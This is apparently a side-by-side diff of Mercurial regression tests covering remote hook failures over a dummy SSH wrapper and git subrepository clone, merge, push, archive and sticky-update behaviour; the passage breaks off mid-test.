528 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
529 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
529 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
530 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
530 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
531 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
531 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
532 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
532 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
533 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
533 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
534
534
535 remote hook failure is attributed to remote
535 remote hook failure is attributed to remote
536
536
537 $ cat > $TESTTMP/failhook << EOF
537 $ cat > $TESTTMP/failhook << EOF
538 > def hook(ui, repo, **kwargs):
538 > def hook(ui, repo, **kwargs):
539 > ui.write('hook failure!\n')
539 > ui.write('hook failure!\n')
540 > ui.flush()
540 > ui.flush()
541 > return 1
541 > return 1
542 > EOF
542 > EOF
543
543
544 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
544 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
545
545
546 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
546 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
547 $ cd hookout
547 $ cd hookout
548 $ touch hookfailure
548 $ touch hookfailure
549 $ hg -q commit -A -m 'remote hook failure'
549 $ hg -q commit -A -m 'remote hook failure'
550 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
550 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
551 pushing to ssh://user@dummy/remote
551 pushing to ssh://user@dummy/remote
552 searching for changes
552 searching for changes
553 remote: adding changesets
553 remote: adding changesets
554 remote: adding manifests
554 remote: adding manifests
555 remote: adding file changes
555 remote: adding file changes
556 remote: added 1 changesets with 1 changes to 1 files
556 remote: added 1 changesets with 1 changes to 1 files
557 remote: hook failure!
557 remote: hook failure!
558 remote: transaction abort!
558 remote: transaction abort!
559 remote: rollback completed
559 remote: rollback completed
560 remote: pretxnchangegroup.fail hook failed
560 remote: pretxnchangegroup.fail hook failed
561 abort: push failed on remote
561 abort: push failed on remote
562 [255]
562 [255]
563
563
564 abort during pull is properly reported as such
564 abort during pull is properly reported as such
565
565
566 $ echo morefoo >> ../remote/foo
566 $ echo morefoo >> ../remote/foo
567 $ hg -R ../remote commit --message "more foo to be pulled"
567 $ hg -R ../remote commit --message "more foo to be pulled"
568 $ cat >> ../remote/.hg/hgrc << EOF
568 $ cat >> ../remote/.hg/hgrc << EOF
569 > [extensions]
569 > [extensions]
570 > crash = ${TESTDIR}/crashgetbundler.py
570 > crash = ${TESTDIR}/crashgetbundler.py
571 > EOF
571 > EOF
572 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
572 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
573 pulling from ssh://user@dummy/remote
573 pulling from ssh://user@dummy/remote
574 searching for changes
574 searching for changes
575 remote: abort: this is an exercise
575 remote: abort: this is an exercise
576 abort: pull failed on remote
576 abort: pull failed on remote
577 [255]
577 [255]
@@ -1,1184 +1,1215 b''
1 #require git
1 #require git
2
2
3 make git commits repeatable
3 make git commits repeatable
4
4
5 $ cat >> $HGRCPATH <<EOF
5 $ cat >> $HGRCPATH <<EOF
6 > [defaults]
6 > [defaults]
7 > commit = -d "0 0"
7 > commit = -d "0 0"
8 > EOF
8 > EOF
9
9
10 $ echo "[core]" >> $HOME/.gitconfig
10 $ echo "[core]" >> $HOME/.gitconfig
11 $ echo "autocrlf = false" >> $HOME/.gitconfig
11 $ echo "autocrlf = false" >> $HOME/.gitconfig
12 $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME
12 $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME
13 $ GIT_AUTHOR_EMAIL='test@example.org'; export GIT_AUTHOR_EMAIL
13 $ GIT_AUTHOR_EMAIL='test@example.org'; export GIT_AUTHOR_EMAIL
14 $ GIT_AUTHOR_DATE='1234567891 +0000'; export GIT_AUTHOR_DATE
14 $ GIT_AUTHOR_DATE='1234567891 +0000'; export GIT_AUTHOR_DATE
15 $ GIT_COMMITTER_NAME="$GIT_AUTHOR_NAME"; export GIT_COMMITTER_NAME
15 $ GIT_COMMITTER_NAME="$GIT_AUTHOR_NAME"; export GIT_COMMITTER_NAME
16 $ GIT_COMMITTER_EMAIL="$GIT_AUTHOR_EMAIL"; export GIT_COMMITTER_EMAIL
16 $ GIT_COMMITTER_EMAIL="$GIT_AUTHOR_EMAIL"; export GIT_COMMITTER_EMAIL
17 $ GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE"; export GIT_COMMITTER_DATE
17 $ GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE"; export GIT_COMMITTER_DATE
18 $ GIT_CONFIG_NOSYSTEM=1; export GIT_CONFIG_NOSYSTEM
18 $ GIT_CONFIG_NOSYSTEM=1; export GIT_CONFIG_NOSYSTEM
19
19
20 root hg repo
20 root hg repo
21
21
22 $ hg init t
22 $ hg init t
23 $ cd t
23 $ cd t
24 $ echo a > a
24 $ echo a > a
25 $ hg add a
25 $ hg add a
26 $ hg commit -m a
26 $ hg commit -m a
27 $ cd ..
27 $ cd ..
28
28
29 new external git repo
29 new external git repo
30
30
31 $ mkdir gitroot
31 $ mkdir gitroot
32 $ cd gitroot
32 $ cd gitroot
33 $ git init -q
33 $ git init -q
34 $ echo g > g
34 $ echo g > g
35 $ git add g
35 $ git add g
36 $ git commit -q -m g
36 $ git commit -q -m g
37
37
38 add subrepo clone
38 add subrepo clone
39
39
40 $ cd ../t
40 $ cd ../t
41 $ echo 's = [git]../gitroot' > .hgsub
41 $ echo 's = [git]../gitroot' > .hgsub
42 $ git clone -q ../gitroot s
42 $ git clone -q ../gitroot s
43 $ hg add .hgsub
43 $ hg add .hgsub
44 $ hg commit -m 'new git subrepo'
44 $ hg commit -m 'new git subrepo'
45 $ hg debugsub
45 $ hg debugsub
46 path s
46 path s
47 source ../gitroot
47 source ../gitroot
48 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
48 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
49
49
50 record a new commit from upstream from a different branch
50 record a new commit from upstream from a different branch
51
51
52 $ cd ../gitroot
52 $ cd ../gitroot
53 $ git checkout -q -b testing
53 $ git checkout -q -b testing
54 $ echo gg >> g
54 $ echo gg >> g
55 $ git commit -q -a -m gg
55 $ git commit -q -a -m gg
56
56
57 $ cd ../t/s
57 $ cd ../t/s
58 $ git pull -q >/dev/null 2>/dev/null
58 $ git pull -q >/dev/null 2>/dev/null
59 $ git checkout -q -b testing origin/testing >/dev/null
59 $ git checkout -q -b testing origin/testing >/dev/null
60
60
61 $ cd ..
61 $ cd ..
62 $ hg status --subrepos
62 $ hg status --subrepos
63 M s/g
63 M s/g
64 $ hg commit -m 'update git subrepo'
64 $ hg commit -m 'update git subrepo'
65 $ hg debugsub
65 $ hg debugsub
66 path s
66 path s
67 source ../gitroot
67 source ../gitroot
68 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
68 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
69
69
70 make $GITROOT pushable, by replacing it with a clone with nothing checked out
70 make $GITROOT pushable, by replacing it with a clone with nothing checked out
71
71
72 $ cd ..
72 $ cd ..
73 $ git clone gitroot gitrootbare --bare -q
73 $ git clone gitroot gitrootbare --bare -q
74 $ rm -rf gitroot
74 $ rm -rf gitroot
75 $ mv gitrootbare gitroot
75 $ mv gitrootbare gitroot
76
76
77 clone root
77 clone root
78
78
79 $ cd t
79 $ cd t
80 $ hg clone . ../tc 2> /dev/null
80 $ hg clone . ../tc 2> /dev/null
81 updating to branch default
81 updating to branch default
82 cloning subrepo s from $TESTTMP/gitroot
82 cloning subrepo s from $TESTTMP/gitroot
83 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
83 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
84 $ cd ../tc
84 $ cd ../tc
85 $ hg debugsub
85 $ hg debugsub
86 path s
86 path s
87 source ../gitroot
87 source ../gitroot
88 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
88 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
89
89
90 update to previous substate
90 update to previous substate
91
91
92 $ hg update 1 -q
92 $ hg update 1 -q
93 $ cat s/g
93 $ cat s/g
94 g
94 g
95 $ hg debugsub
95 $ hg debugsub
96 path s
96 path s
97 source ../gitroot
97 source ../gitroot
98 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
98 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
99
99
100 clone root, make local change
100 clone root, make local change
101
101
102 $ cd ../t
102 $ cd ../t
103 $ hg clone . ../ta 2> /dev/null
103 $ hg clone . ../ta 2> /dev/null
104 updating to branch default
104 updating to branch default
105 cloning subrepo s from $TESTTMP/gitroot
105 cloning subrepo s from $TESTTMP/gitroot
106 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
106 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
107
107
108 $ cd ../ta
108 $ cd ../ta
109 $ echo ggg >> s/g
109 $ echo ggg >> s/g
110 $ hg status --subrepos
110 $ hg status --subrepos
111 M s/g
111 M s/g
112 $ hg diff --subrepos
112 $ hg diff --subrepos
113 diff --git a/s/g b/s/g
113 diff --git a/s/g b/s/g
114 index 089258f..85341ee 100644
114 index 089258f..85341ee 100644
115 --- a/s/g
115 --- a/s/g
116 +++ b/s/g
116 +++ b/s/g
117 @@ -1,2 +1,3 @@
117 @@ -1,2 +1,3 @@
118 g
118 g
119 gg
119 gg
120 +ggg
120 +ggg
121 $ hg commit --subrepos -m ggg
121 $ hg commit --subrepos -m ggg
122 committing subrepository s
122 committing subrepository s
123 $ hg debugsub
123 $ hg debugsub
124 path s
124 path s
125 source ../gitroot
125 source ../gitroot
126 revision 79695940086840c99328513acbe35f90fcd55e57
126 revision 79695940086840c99328513acbe35f90fcd55e57
127
127
128 clone root separately, make different local change
128 clone root separately, make different local change
129
129
130 $ cd ../t
130 $ cd ../t
131 $ hg clone . ../tb 2> /dev/null
131 $ hg clone . ../tb 2> /dev/null
132 updating to branch default
132 updating to branch default
133 cloning subrepo s from $TESTTMP/gitroot
133 cloning subrepo s from $TESTTMP/gitroot
134 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
134 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
135
135
136 $ cd ../tb/s
136 $ cd ../tb/s
137 $ hg status --subrepos
137 $ hg status --subrepos
138 $ echo f > f
138 $ echo f > f
139 $ hg status --subrepos
139 $ hg status --subrepos
140 ? s/f
140 ? s/f
141 $ hg add .
141 $ hg add .
142 adding f
142 adding f
143 $ git add f
143 $ git add f
144 $ cd ..
144 $ cd ..
145
145
146 $ hg status --subrepos
146 $ hg status --subrepos
147 A s/f
147 A s/f
148 $ hg commit --subrepos -m f
148 $ hg commit --subrepos -m f
149 committing subrepository s
149 committing subrepository s
150 $ hg debugsub
150 $ hg debugsub
151 path s
151 path s
152 source ../gitroot
152 source ../gitroot
153 revision aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
153 revision aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
154
154
155 user b push changes
155 user b push changes
156
156
157 $ hg push 2>/dev/null
157 $ hg push 2>/dev/null
158 pushing to $TESTTMP/t (glob)
158 pushing to $TESTTMP/t (glob)
159 pushing branch testing of subrepository "s"
159 pushing branch testing of subrepository "s"
160 searching for changes
160 searching for changes
161 adding changesets
161 adding changesets
162 adding manifests
162 adding manifests
163 adding file changes
163 adding file changes
164 added 1 changesets with 1 changes to 1 files
164 added 1 changesets with 1 changes to 1 files
165
165
166 user a pulls, merges, commits
166 user a pulls, merges, commits
167
167
168 $ cd ../ta
168 $ cd ../ta
169 $ hg pull
169 $ hg pull
170 pulling from $TESTTMP/t (glob)
170 pulling from $TESTTMP/t (glob)
171 searching for changes
171 searching for changes
172 adding changesets
172 adding changesets
173 adding manifests
173 adding manifests
174 adding file changes
174 adding file changes
175 added 1 changesets with 1 changes to 1 files (+1 heads)
175 added 1 changesets with 1 changes to 1 files (+1 heads)
176 (run 'hg heads' to see heads, 'hg merge' to merge)
176 (run 'hg heads' to see heads, 'hg merge' to merge)
177 $ hg merge 2>/dev/null
177 $ hg merge 2>/dev/null
178 subrepository s diverged (local revision: 7969594, remote revision: aa84837)
178 subrepository s diverged (local revision: 7969594, remote revision: aa84837)
179 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
179 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
180 pulling subrepo s from $TESTTMP/gitroot
180 pulling subrepo s from $TESTTMP/gitroot
181 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
181 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
182 (branch merge, don't forget to commit)
182 (branch merge, don't forget to commit)
183 $ hg st --subrepos s
183 $ hg st --subrepos s
184 A s/f
184 A s/f
185 $ cat s/f
185 $ cat s/f
186 f
186 f
187 $ cat s/g
187 $ cat s/g
188 g
188 g
189 gg
189 gg
190 ggg
190 ggg
191 $ hg commit --subrepos -m 'merge'
191 $ hg commit --subrepos -m 'merge'
192 committing subrepository s
192 committing subrepository s
193 $ hg status --subrepos --rev 1:5
193 $ hg status --subrepos --rev 1:5
194 M .hgsubstate
194 M .hgsubstate
195 M s/g
195 M s/g
196 A s/f
196 A s/f
197 $ hg debugsub
197 $ hg debugsub
198 path s
198 path s
199 source ../gitroot
199 source ../gitroot
200 revision f47b465e1bce645dbf37232a00574aa1546ca8d3
200 revision f47b465e1bce645dbf37232a00574aa1546ca8d3
201 $ hg push 2>/dev/null
201 $ hg push 2>/dev/null
202 pushing to $TESTTMP/t (glob)
202 pushing to $TESTTMP/t (glob)
203 pushing branch testing of subrepository "s"
203 pushing branch testing of subrepository "s"
204 searching for changes
204 searching for changes
205 adding changesets
205 adding changesets
206 adding manifests
206 adding manifests
207 adding file changes
207 adding file changes
208 added 2 changesets with 2 changes to 1 files
208 added 2 changesets with 2 changes to 1 files
209
209
210 make upstream git changes
210 make upstream git changes
211
211
212 $ cd ..
212 $ cd ..
213 $ git clone -q gitroot gitclone
213 $ git clone -q gitroot gitclone
214 $ cd gitclone
214 $ cd gitclone
215 $ echo ff >> f
215 $ echo ff >> f
216 $ git commit -q -a -m ff
216 $ git commit -q -a -m ff
217 $ echo fff >> f
217 $ echo fff >> f
218 $ git commit -q -a -m fff
218 $ git commit -q -a -m fff
219 $ git push origin testing 2>/dev/null
219 $ git push origin testing 2>/dev/null
220
220
221 make and push changes to hg without updating the subrepo
221 make and push changes to hg without updating the subrepo
222
222
223 $ cd ../t
223 $ cd ../t
224 $ hg clone . ../td 2>&1 | egrep -v '^Cloning into|^done\.'
224 $ hg clone . ../td 2>&1 | egrep -v '^Cloning into|^done\.'
225 updating to branch default
225 updating to branch default
226 cloning subrepo s from $TESTTMP/gitroot
226 cloning subrepo s from $TESTTMP/gitroot
227 checking out detached HEAD in subrepository "s"
227 checking out detached HEAD in subrepository "s"
228 check out a git branch if you intend to make changes
228 check out a git branch if you intend to make changes
229 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
229 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
230 $ cd ../td
230 $ cd ../td
231 $ echo aa >> a
231 $ echo aa >> a
232 $ hg commit -m aa
232 $ hg commit -m aa
233 $ hg push
233 $ hg push
234 pushing to $TESTTMP/t (glob)
234 pushing to $TESTTMP/t (glob)
235 searching for changes
235 searching for changes
236 adding changesets
236 adding changesets
237 adding manifests
237 adding manifests
238 adding file changes
238 adding file changes
239 added 1 changesets with 1 changes to 1 files
239 added 1 changesets with 1 changes to 1 files
240
240
241 sync to upstream git, distribute changes
241 sync to upstream git, distribute changes
242
242
243 $ cd ../ta
243 $ cd ../ta
244 $ hg pull -u -q
244 $ hg pull -u -q
245 $ cd s
245 $ cd s
246 $ git pull -q >/dev/null 2>/dev/null
246 $ git pull -q >/dev/null 2>/dev/null
247 $ cd ..
247 $ cd ..
248 $ hg commit -m 'git upstream sync'
248 $ hg commit -m 'git upstream sync'
249 $ hg debugsub
249 $ hg debugsub
250 path s
250 path s
251 source ../gitroot
251 source ../gitroot
252 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
252 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
253 $ hg push -q
253 $ hg push -q
254
254
255 $ cd ../tb
255 $ cd ../tb
256 $ hg pull -q
256 $ hg pull -q
257 $ hg update 2>/dev/null
257 $ hg update 2>/dev/null
258 pulling subrepo s from $TESTTMP/gitroot
258 pulling subrepo s from $TESTTMP/gitroot
259 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
259 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
260 $ hg debugsub
260 $ hg debugsub
261 path s
261 path s
262 source ../gitroot
262 source ../gitroot
263 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
263 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
264
264
265 create a new git branch
265 create a new git branch
266
266
267 $ cd s
267 $ cd s
268 $ git checkout -b b2
268 $ git checkout -b b2
269 Switched to a new branch 'b2'
269 Switched to a new branch 'b2'
270 $ echo a>a
270 $ echo a>a
271 $ git add a
271 $ git add a
272 $ git commit -qm 'add a'
272 $ git commit -qm 'add a'
273 $ cd ..
273 $ cd ..
274 $ hg commit -m 'add branch in s'
274 $ hg commit -m 'add branch in s'
275
275
276 pulling new git branch should not create tracking branch named 'origin/b2'
276 pulling new git branch should not create tracking branch named 'origin/b2'
277 (issue3870)
277 (issue3870)
278 $ cd ../td/s
278 $ cd ../td/s
279 $ git remote set-url origin $TESTTMP/tb/s
279 $ git remote set-url origin $TESTTMP/tb/s
280 $ git branch --no-track oldtesting
280 $ git branch --no-track oldtesting
281 $ cd ..
281 $ cd ..
282 $ hg pull -q ../tb
282 $ hg pull -q ../tb
283 $ hg up
283 $ hg up
284 From $TESTTMP/tb/s
284 From $TESTTMP/tb/s
285 * [new branch] b2 -> origin/b2
285 * [new branch] b2 -> origin/b2
286 Previous HEAD position was f47b465... merge
286 Previous HEAD position was f47b465... merge
287 Switched to a new branch 'b2'
287 Switched to a new branch 'b2'
288 pulling subrepo s from $TESTTMP/tb/s
288 pulling subrepo s from $TESTTMP/tb/s
289 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
289 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
290
290
291 update to a revision without the subrepo, keeping the local git repository
291 update to a revision without the subrepo, keeping the local git repository
292
292
293 $ cd ../t
293 $ cd ../t
294 $ hg up 0
294 $ hg up 0
295 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
295 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
296 $ ls -a s
296 $ ls -a s
297 .
297 .
298 ..
298 ..
299 .git
299 .git
300
300
301 $ hg up 2
301 $ hg up 2
302 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
302 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
303 $ ls -a s
303 $ ls -a s
304 .
304 .
305 ..
305 ..
306 .git
306 .git
307 g
307 g
308
308
309 archive subrepos
309 archive subrepos
310
310
311 $ cd ../tc
311 $ cd ../tc
312 $ hg pull -q
312 $ hg pull -q
313 $ hg archive --subrepos -r 5 ../archive 2>/dev/null
313 $ hg archive --subrepos -r 5 ../archive 2>/dev/null
314 pulling subrepo s from $TESTTMP/gitroot
314 pulling subrepo s from $TESTTMP/gitroot
315 $ cd ../archive
315 $ cd ../archive
316 $ cat s/f
316 $ cat s/f
317 f
317 f
318 $ cat s/g
318 $ cat s/g
319 g
319 g
320 gg
320 gg
321 ggg
321 ggg
322
322
323 $ hg -R ../tc archive --subrepo -r 5 -X ../tc/**f ../archive_x 2>/dev/null
323 $ hg -R ../tc archive --subrepo -r 5 -X ../tc/**f ../archive_x 2>/dev/null
324 $ find ../archive_x | sort | grep -v pax_global_header
324 $ find ../archive_x | sort | grep -v pax_global_header
325 ../archive_x
325 ../archive_x
326 ../archive_x/.hg_archival.txt
326 ../archive_x/.hg_archival.txt
327 ../archive_x/.hgsub
327 ../archive_x/.hgsub
328 ../archive_x/.hgsubstate
328 ../archive_x/.hgsubstate
329 ../archive_x/a
329 ../archive_x/a
330 ../archive_x/s
330 ../archive_x/s
331 ../archive_x/s/g
331 ../archive_x/s/g
332
332
333 $ hg -R ../tc archive -S ../archive.tgz --prefix '.' 2>/dev/null
333 $ hg -R ../tc archive -S ../archive.tgz --prefix '.' 2>/dev/null
334 $ tar -tzf ../archive.tgz | sort | grep -v pax_global_header
334 $ tar -tzf ../archive.tgz | sort | grep -v pax_global_header
335 .hg_archival.txt
335 .hg_archival.txt
336 .hgsub
336 .hgsub
337 .hgsubstate
337 .hgsubstate
338 a
338 a
339 s/g
339 s/g
340
340
341 create nested repo
341 create nested repo
342
342
343 $ cd ..
343 $ cd ..
344 $ hg init outer
344 $ hg init outer
345 $ cd outer
345 $ cd outer
346 $ echo b>b
346 $ echo b>b
347 $ hg add b
347 $ hg add b
348 $ hg commit -m b
348 $ hg commit -m b
349
349
350 $ hg clone ../t inner 2> /dev/null
350 $ hg clone ../t inner 2> /dev/null
351 updating to branch default
351 updating to branch default
352 cloning subrepo s from $TESTTMP/gitroot
352 cloning subrepo s from $TESTTMP/gitroot
353 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
353 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
354 $ echo inner = inner > .hgsub
354 $ echo inner = inner > .hgsub
355 $ hg add .hgsub
355 $ hg add .hgsub
356 $ hg commit -m 'nested sub'
356 $ hg commit -m 'nested sub'
357
357
358 nested commit
358 nested commit
359
359
360 $ echo ffff >> inner/s/f
360 $ echo ffff >> inner/s/f
361 $ hg status --subrepos
361 $ hg status --subrepos
362 M inner/s/f
362 M inner/s/f
363 $ hg commit --subrepos -m nested
363 $ hg commit --subrepos -m nested
364 committing subrepository inner
364 committing subrepository inner
365 committing subrepository inner/s (glob)
365 committing subrepository inner/s (glob)
366
366
367 nested archive
367 nested archive
368
368
369 $ hg archive --subrepos ../narchive
369 $ hg archive --subrepos ../narchive
370 $ ls ../narchive/inner/s | grep -v pax_global_header
370 $ ls ../narchive/inner/s | grep -v pax_global_header
371 f
371 f
372 g
372 g
373
373
374 relative source expansion
374 relative source expansion
375
375
376 $ cd ..
376 $ cd ..
377 $ mkdir d
377 $ mkdir d
378 $ hg clone t d/t 2> /dev/null
378 $ hg clone t d/t 2> /dev/null
379 updating to branch default
379 updating to branch default
380 cloning subrepo s from $TESTTMP/gitroot
380 cloning subrepo s from $TESTTMP/gitroot
381 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
381 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
382
382
383 Don't crash if the subrepo is missing
383 Don't crash if the subrepo is missing
384
384
385 $ hg clone t missing -q
385 $ hg clone t missing -q
386 $ cd missing
386 $ cd missing
387 $ rm -rf s
387 $ rm -rf s
388 $ hg status -S
388 $ hg status -S
389 $ hg sum | grep commit
389 $ hg sum | grep commit
390 commit: 1 subrepos
390 commit: 1 subrepos
391 $ hg push -q
391 $ hg push -q
392 abort: subrepo s is missing (in subrepository "s")
392 abort: subrepo s is missing (in subrepository "s")
393 [255]
393 [255]
394 $ hg commit --subrepos -qm missing
394 $ hg commit --subrepos -qm missing
395 abort: subrepo s is missing (in subrepository "s")
395 abort: subrepo s is missing (in subrepository "s")
396 [255]
396 [255]
397
397
398 #if symlink
398 #if symlink
399 Don't crash if subrepo is a broken symlink
399 Don't crash if subrepo is a broken symlink
400 $ ln -s broken s
400 $ ln -s broken s
401 $ hg status -S
401 $ hg status -S
402 $ hg push -q
402 $ hg push -q
403 abort: subrepo s is missing (in subrepository "s")
403 abort: subrepo s is missing (in subrepository "s")
404 [255]
404 [255]
405 $ hg commit --subrepos -qm missing
405 $ hg commit --subrepos -qm missing
406 abort: subrepo s is missing (in subrepository "s")
406 abort: subrepo s is missing (in subrepository "s")
407 [255]
407 [255]
408 $ rm s
408 $ rm s
409 #endif
409 #endif
410
410
411 $ hg update -C 2> /dev/null
411 $ hg update -C 2> /dev/null
412 cloning subrepo s from $TESTTMP/gitroot
412 cloning subrepo s from $TESTTMP/gitroot
413 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
413 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
414 $ hg sum | grep commit
414 $ hg sum | grep commit
415 commit: (clean)
415 commit: (clean)
416
416
417 Don't crash if the .hgsubstate entry is missing
417 Don't crash if the .hgsubstate entry is missing
418
418
419 $ hg update 1 -q
419 $ hg update 1 -q
420 $ hg rm .hgsubstate
420 $ hg rm .hgsubstate
421 $ hg commit .hgsubstate -m 'no substate'
421 $ hg commit .hgsubstate -m 'no substate'
422 nothing changed
422 nothing changed
423 [1]
423 [1]
424 $ hg tag -l nosubstate
424 $ hg tag -l nosubstate
425 $ hg manifest
425 $ hg manifest
426 .hgsub
426 .hgsub
427 .hgsubstate
427 .hgsubstate
428 a
428 a
429
429
430 $ hg status -S
430 $ hg status -S
431 R .hgsubstate
431 R .hgsubstate
432 $ hg sum | grep commit
432 $ hg sum | grep commit
433 commit: 1 removed, 1 subrepos (new branch head)
433 commit: 1 removed, 1 subrepos (new branch head)
434
434
435 $ hg commit -m 'restore substate'
435 $ hg commit -m 'restore substate'
436 nothing changed
436 nothing changed
437 [1]
437 [1]
438 $ hg manifest
438 $ hg manifest
439 .hgsub
439 .hgsub
440 .hgsubstate
440 .hgsubstate
441 a
441 a
442 $ hg sum | grep commit
442 $ hg sum | grep commit
443 commit: 1 removed, 1 subrepos (new branch head)
443 commit: 1 removed, 1 subrepos (new branch head)
444
444
445 $ hg update -qC nosubstate
445 $ hg update -qC nosubstate
446 $ ls s
446 $ ls s
447 g
447 g
448
448
449 issue3109: false positives in git diff-index
449 issue3109: false positives in git diff-index
450
450
451 $ hg update -q
451 $ hg update -q
452 $ touch -t 200001010000 s/g
452 $ touch -t 200001010000 s/g
453 $ hg status --subrepos
453 $ hg status --subrepos
454 $ touch -t 200001010000 s/g
454 $ touch -t 200001010000 s/g
455 $ hg sum | grep commit
455 $ hg sum | grep commit
456 commit: (clean)
456 commit: (clean)
457
457
458 Check hg update --clean
458 Check hg update --clean
459 $ cd $TESTTMP/ta
459 $ cd $TESTTMP/ta
460 $ echo > s/g
460 $ echo > s/g
461 $ cd s
461 $ cd s
462 $ echo c1 > f1
462 $ echo c1 > f1
463 $ echo c1 > f2
463 $ echo c1 > f2
464 $ git add f1
464 $ git add f1
465 $ cd ..
465 $ cd ..
466 $ hg status -S
466 $ hg status -S
467 M s/g
467 M s/g
468 A s/f1
468 A s/f1
469 ? s/f2
469 ? s/f2
470 $ ls s
470 $ ls s
471 f
471 f
472 f1
472 f1
473 f2
473 f2
474 g
474 g
475 $ hg update --clean
475 $ hg update --clean
476 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
476 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
477 $ hg status -S
477 $ hg status -S
478 ? s/f1
478 ? s/f1
479 ? s/f2
479 ? s/f2
480 $ ls s
480 $ ls s
481 f
481 f
482 f1
482 f1
483 f2
483 f2
484 g
484 g
485
485
486 Sticky subrepositories, no changes
486 Sticky subrepositories, no changes
487 $ cd $TESTTMP/ta
487 $ cd $TESTTMP/ta
488 $ hg id -n
488 $ hg id -n
489 7
489 7
490 $ cd s
490 $ cd s
491 $ git rev-parse HEAD
491 $ git rev-parse HEAD
492 32a343883b74769118bb1d3b4b1fbf9156f4dddc
492 32a343883b74769118bb1d3b4b1fbf9156f4dddc
493 $ cd ..
493 $ cd ..
494 $ hg update 1 > /dev/null 2>&1
494 $ hg update 1 > /dev/null 2>&1
495 $ hg id -n
495 $ hg id -n
496 1
496 1
497 $ cd s
497 $ cd s
498 $ git rev-parse HEAD
498 $ git rev-parse HEAD
499 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
499 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
500 $ cd ..
500 $ cd ..
501
501
502 Sticky subrepositories, file changes
502 Sticky subrepositories, file changes
503 $ touch s/f1
503 $ touch s/f1
504 $ cd s
504 $ cd s
505 $ git add f1
505 $ git add f1
506 $ cd ..
506 $ cd ..
507 $ hg id -n
507 $ hg id -n
508 1+
508 1+
509 $ cd s
509 $ cd s
510 $ git rev-parse HEAD
510 $ git rev-parse HEAD
511 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
511 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
512 $ cd ..
512 $ cd ..
513 $ hg update 4
513 $ hg update 4
514 subrepository s diverged (local revision: da5f5b1, remote revision: aa84837)
